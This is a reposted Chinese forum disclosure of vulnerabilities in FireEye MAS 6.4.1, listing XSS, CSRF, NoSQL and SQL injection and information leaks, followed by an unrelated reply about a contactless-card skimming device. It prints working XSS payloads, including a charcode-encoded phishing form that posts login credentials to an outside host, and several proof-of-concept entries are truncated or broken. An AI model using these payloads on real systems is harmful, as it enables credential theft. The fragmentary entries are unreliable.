首页
社区
课程
招聘
[旧帖] [转帖]FireEye 木马分析引擎 (MAS) 6.4.1 0.00雪花
发表于: 2016-7-9 11:17 2252

[旧帖] [转帖]FireEye 木马分析引擎 (MAS) 6.4.1 0.00雪花

2016-7-9 11:17
2252
*[Multiples Vulnerabilities] *
* *
* 3 XSS (reflected) *
* 1 CSRF *
* 1 NoSQLi (Json object) *
* 1 PostGreSQL SQLi (Exploitable?) *
* 1 File and Path Disclosure *
* 1 Source code Info-leak
[*] XSS:
跨站1
https://192.168.1.50/yara/show_ya_file?name=<body onload=alert(‘XSSED’)>
利用POC:
https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.location=(String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109))>
或者进行钓鱼:
https://192.168.1.50/yara/show_ya_file?name=<body
onload=document.write(String.fromCharCode(60,104,116,109,108,62,60,98,111,100,121,62,60,104,101,97,1097,62,60,47,104,101,97,100,62,60,100,105,118,32,115,116,121,108,101,61,34,116,101,120,116,45,97,108,105,103,110,58,32,99,101,110,116,101,114,59,34,62,60,102,111,114,109,32,77,101,116,104,111,100,61,34,80,79,83,84,34,32,65,99,116,105,111,110,61,34,104,116,116,112,115,58,47,47,119,119,119,46,103,111,111,103,108,101,46,114,117,34,62,80,104,105,115,104,105,110,103,112,97,103,101,32,58,60,98,114,32,47,62,60,98,114,47,62,85,115,101,114,110,97,109,101,32,58,60,98,114,32,47,62,32,60,105,110,112,117,116,32,110,97,109,101,61,34,85,115,101,114,34,32,47,62,60,98,114,32,47,62,80,97,115,115,119,111,114,100,32,58,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,80,97,115,115,119,111,114,100,34,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,47,62,60,98,114,32,47,62,60,98,114,32,47,62,60,105,110,112,117,116,32,110,97,109,101,61,34,86,97,108,105,100,34,32,118,97,108,117,101,61,34,79,107,32,33,34,116,121,112,101,61,34,115,117,98,109,105,116,34,32,47,62,32,60,98,114,32,47,62,60,47,102,111,114,109,62,60,47,100,105,118,62,60,47,98,111,100,121,62,60,47,104,116,109,108,62))>
跨站2
https://192.168.1.50/network/network?new_domain=

跨站3
https://192.168.1.50/manual/csc?mode=

[*] CSRF:
1 管理员退出
https://192.168.1.50/network/network?new_domain=

2 报告删除
https://192.168.1.50/network/network?new_domain=

FROM events /**
output:
Event ID ‘9999 OR SELECT 1,2 FROM events ‘ could not be retrieved.
Couldn’t find Event with id=9999 OR SELECT 1,2 FROM events
https://192.168.1.50/event_stream/send_pcap_file?ev_id=99999999999 Output:
Event ID ‘99999999999’ could not be retrieved.
PG::Error: ERROR: value “99999999999” is out of range for type

[课程]FART 脱壳王!加量不加价!FART作者讲授!

收藏
免费 0
支持
分享
最新回复 (2)
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
有点乱,但是听见的看起来
2016-7-11 13:34
0
雪    币: 30
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
英国每日邮报发表了一篇有趣的文章,讲有骗子使用名为“非触碰式注入X5t”的新的高科技小工具,用来扫描和克隆附近的非接触式支付方式(如apple pay ,支付宝)支付信息并占为己用,进行非法支付。克隆信息者只需在持有非接触类支付卡的受害者附近一段距离内,而无需与持卡者有其他联系。
非接触式支付方式近年来大热,它使得用户能够进行流水式的支付流程,既不需要输入POS机密码,也无需提供签名来完成操作。同时,这种付款方式有30英镑(约280元人命币)的消费限额。但请仍然保持警惕,这数额足以激励罪犯展开行动。
该装置能够窃取支付卡数据,包括卡号、持卡人姓名和地址。该装置自带的卡片扫描仪被称为“非触碰式注入X5(Contactless Infusion X5)”,它的功能非常强大,可以窃取数据,并使用得到的数据来克隆新卡。
据英国每日星报周日刊报导,整套设备都在非法市场中售卖,其中包括非接触式注入X5t,其软件设备和20个空白卡位就随时等候被使用。该设备在伦敦曾售出过£500(711.24美元)的高价,网络犯罪的器具在黑市公开售卖的先史并没有,专家推测它很可能是第一个在黑市售卖的这类设备。
每日邮报还称,“阅读器- 非接触式注入X5” 能够捕捉到经过加密的数据,且在某些情况下,甚至能够提取卡号,持有人的名称,地址和迷你简介”。 自称CC兄弟帮的刷卡骗子团伙售卖现成的CON套件,其中包括内置电池、USB电缆、20张空白的芯片信用卡和软件。
他们是由经销商在市面上将售价提至£500,或将设备更便宜地投入匿名“暗网”,欺诈市场。我们的调查显者展示出其中一个卡片阅读器,据说它已经有过占领伦敦和英国东南部街道的战绩了。
网络罪犯就近克隆快捷支付信息
非接触:本机由CC哥们售卖(来源 –每日星报)
以下是骗子集团为非触碰式注入X5t做的广告:
“这是黑市上出售的第一个可以黑非接触式银行卡的设备。这设备是我们设计和开发的,可以从8厘米以外读取任何银行卡,每秒可以读取1024字节,也就相当于每秒读取15张银行。”
“你唯一要做的就是离持有非接触式银行卡的人群近一些 。他们约占所有借记卡持有者的一半。然后您离发达也就不远了。”
卡的使用骤增,有赖于非接触式支付方式的的“一站式付款”的移动端支付方式,如用Apple Pay进行更加便捷的支付。
这种技术代表着未来支付方式的发展走向。据估计,到2025年,信用卡、借记卡和签账卡将占据所有支付数额的一半以上。仅是到2021年,借记卡付款的数量将会达到一万四千五百亿,非接触式的快捷支付方式即那个会成为这些卡类的最常用支付方式。
每日邮报称:“预计到2025年人们将每天都使用借记卡,信用卡或签账卡。频率大约每月30次。”
“英国卡片协会表示,手机便捷消费方式增速惊人。其支付消费额在三月份一个月内支出便超过了15亿英镑。2015年11月快捷支付方式才刚达成了10亿英镑消费额,没想到短短四个月又树立了新的里程碑。”
根据每日星报提供的数据,有三千一百万张信用卡和九亿五千七百万借记卡现在在流通中,这些卡的50%与非接触式便捷支付挂钩。去年非接触式支付方式的支付额达到了七十八亿英镑,如今其限额为单笔30英镑。
据可靠信息,骗子集团于2015年10月期间已被拘捕,并缴款十八万五千英镑。
2016-7-13 11:00
0
游客
登录 | 注册 方可回帖
返回
//